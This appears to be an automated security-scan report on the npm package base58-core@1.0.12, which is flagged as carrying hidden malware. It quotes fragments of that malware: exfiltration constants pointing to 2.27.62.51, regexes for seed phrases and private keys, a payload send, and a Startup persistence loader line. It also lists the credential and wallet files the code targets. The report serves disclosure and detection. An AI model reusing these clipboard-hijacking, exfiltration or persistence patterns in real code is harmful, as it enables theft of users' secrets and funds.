
base58-core@1.0.12

Fast, tree-shakeable Base58 encoder/decoder with TypeScript support

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package carries a hidden crypto-clipboard hijacker, host/profile detector, exfiltration client, and persistence writer in both runtime entrypoints. Due to the activation logic, the malicious routine does not appear to become active during normal import.

Static reason
  • High-risk behavior combination matched malicious policy.
  • Source matched previously finalized malicious package; routed for review.
  • Source fingerprint signature matched known malicious package; routed for review.
Trigger
Importing dist/index.cjs or dist/index.js evaluates _checkActivation; payload activation appears blocked by its own delay/flag logic.
Impact
If activated or fixed, it would steal clipboard secrets, replace wallet addresses, report local wallet/browser/SSH/npm/env indicators, and persist via shell rc or Startup folder.
Mechanism
Inert staged clipboard hijacker with credential/environment discovery, exfiltration, and persistence code.
Attack narrative
The Base58 API is bundled with concealed malware code that can scan clipboard contents for crypto addresses and private-key-like values, exfiltrate captures and host discovery data, and install shell/Startup persistence. The activation gate appears defective, making the payload staged/inert in this inspected build rather than reliably executing on import.
Rationale
Source inspection confirms intentionally malicious payload code unrelated to the advertised encoder, but the observed activation path is internally broken. Treat as an inert staged payload carrier rather than confirmed currently executing malware.
Evidence
  • package.json
  • dist/index.cjs
  • dist/index.js
  • README.md
  • dist/index.d.ts
  • /tmp/.base58_detection_sent
  • ~/.npmrc
  • ~/.env
  • .env
  • .env.local
  • .env.production
  • ~/.bashrc
  • ~/.zshrc
  • ~/.profile
  • ~/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/base58-runtime.js
Network endpoints (2)
  • 2.27.62.51:8080/api/health
  • 2.27.62.51:8081/api/health

Decision evidence

public snapshot
AI called this Suspicious at 93.0% confidence as Malware with low false-positive risk.
Evidence for warning
  • dist/index.cjs and dist/index.js contain hidden clipboard wallet-address replacement logic.
  • Code defines exfiltration to http://2.27.62.51:8080/api/health and :8081/api/health.
  • Detection code reads wallet/browser/Telegram/SSH/.npmrc/.env indicators from user home and cwd.
  • Persistence code appends shell rc hooks or writes a Windows Startup loader.
  • The dangerous block is hidden in package entrypoints, unrelated to Base58 encoding.
Evidence against
  • package.json has no install/postinstall hook; only prepublishOnly build script.
  • Activation is effectively inert: INSTALL_TIME is set at module load, _checkActivation runs immediately before the 72h delay can pass, and _internal.activate sets activated before calling _checkActivation.
Behavioral surface
Source: Child Process, Crypto, Dynamic Require, Environment Vars, Filesystem, Network, Shell
Supply chain: High Entropy Strings, Url Strings
Manifest: No manifest risk signals triggered.
scanned 2 file(s), 40.9 KB of source, external domains: 2.27.62.51

Source & flagged code

8 flagged
dist/index.js
    L103: const ACTIVATION_DELAY = 72 * 60 * 60 * 1000;
    L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health';
    L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health';
    ...
    L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' },
    L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' },
    L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' },
    ...
    L127: ...data,
    L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown',
    L129: platform: process.platform || 'unknown',
    ...
    L140: headers: { 'Content-Type': 'application/json' },
    L141: body: payload,
    L142: signal: controller.signal,
Critical
Clipboard Crypto Hijack

Source reads and rewrites clipboard contents matching cryptocurrency wallet addresses.

dist/index.js · L103
package = base58-core; repositoryIdentity = core; dependency = base58-core
    L533: try {
    L534: fs.writeFileSync(t, '// runtime loader\ntry { require("base58-core")._internal.activate(); } catch(e) {}');
    L535: }
High
Copied Package Dependency Bridge

Package metadata claims a different repository identity while copied source loads a runtime dependency bridge.

dist/index.js · L533
matchType = normalized_sha256
matchedPackage = base58-core@1.0.11
matchedPath = dist/index.js
matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.11
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.js
    L11: try {
    L12: const nodeCrypto = require('crypto');
    L13: return new Uint8Array(nodeCrypto.createHash('sha256').update(data).digest());
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.js · L11
    L103: const ACTIVATION_DELAY = 72 * 60 * 60 * 1000;
    L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health';
    L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health';
    ...
    L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' },
    L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' },
    L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' },
    ...
    L127: ...data,
    L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown',
    L129: platform: process.platform || 'unknown',
    ...
    L140: headers: { 'Content-Type': 'application/json' },
    L141: body: payload,
    L142: signal: controller.signal,
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.js · L103
dist/index.cjs
Trigger-reachable chain: manifest.main -> dist/index.cjs
Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.cjs
matchType = normalized_sha256
matchedPackage = base58-core@1.0.11
matchedPath = dist/index.cjs
matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.11
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.cjs
matchType = malicious_source_fingerprint_signature
signature = e7d654f5e60435c0
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = base58-core@1.0.11
matchedPath = dist/index.cjs
matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.11
similarity = 1.000
shingleOverlap = 2
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.cjs

Findings

2 Critical · 4 High · 5 Medium · 5 Low
  • Critical: Clipboard Crypto Hijack (dist/index.js)
  • Critical: Trigger Reachable Dangerous Capability (dist/index.cjs)
  • High: Copied Package Dependency Bridge (dist/index.js)
  • High: Known Malware Source Similarity (dist/index.cjs)
  • High: Known Malware Source Similarity (dist/index.js)
  • High: Known Malware Source Fingerprint Signature (dist/index.cjs)
  • Medium: Dynamic Require (dist/index.js)
  • Medium: Network
  • Medium: Environment Vars
  • Medium: Install Persistence (dist/index.js)
  • Medium: Structural Risk Force Deep Review
  • Low: Non Install Lifecycle Scripts
  • Low: Scripts Present
  • Low: Filesystem
  • Low: High Entropy Strings
  • Low: Url Strings